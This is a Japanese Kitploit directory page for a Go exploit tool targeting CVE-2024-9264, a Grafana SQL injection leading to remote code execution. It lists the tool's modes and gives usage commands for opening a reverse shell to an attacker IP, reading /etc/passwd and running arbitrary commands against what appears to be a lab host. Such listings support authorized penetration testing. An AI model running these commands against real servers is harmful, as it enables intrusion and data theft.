Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-9264 — Grafana バージョン 11.0.x、11.1.x、および 11.2.x に影響を与える CVE-2024-9264 の Go 実装 | Kitploit
ツール/GitHubGitHub/cythonic1/cve-2024-9264
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

Grafana バージョン 11.0.x、11.1.x、および 11.2.x に影響を与える CVE-2024-9264 の Go 実装

リポジトリを見る
311年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
ウェブサイト
共有

🚨 CVE-2024-9264 - Grafana SQLインジェクションによるリモートコード実行(RCE)とファイル読み取り

CVE-2024-9264 のエクスプロイトツール。Grafanaの重大な脆弱性で、認証された攻撃者がSQLクエリを実行し、RCEに至る可能性があります。

🛡️ このツールは厳格に教育目的および許可されたペネトレーションテストのために使用されます。
許可されていない使用は違法かつ非倫理的です。


🧠 脆弱性の概要

🕳️ CVE-2024-9264とは?

CVE-2024-9264 はGrafanaにおける重大な欠陥で、認証された攻撃者がSQLコマンドを実行し、RCEやファイル読み取りを引き起こすことを許します。

🧬 根本原因

  • 不十分なサニタイゼーション。

💥 影響

  • RCE: 任意のコマンドの実行、リバースシェルの取得、機密ファイルの読み取りが可能。
  • 重大な深刻度: 成功した場合、サーバー完全乗っ取りの可能性があります。

⚒️ 機能

  • 複数の攻撃モードをサポート:
    • file – 任意のファイルの読み取り(例: /etc/passwd)
  • shell – 攻撃者マシンへのリバースシェル
  • command – 任意のシェルコマンドの実行(例: whoami)
  • 攻撃者のIP、ポート、認証情報をカスタマイズ可能

  • 🚀 使い方

    ヘルプメニュー

    すべての引数が必要なわけではありません。

    例

    シェルの取得

    go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

    ファイルの読み取り

    go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

    単一コマンドの実行

    go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

    🔧 コマンドラインフラグ

    go run main.go [flags]

    ツールをダウンロード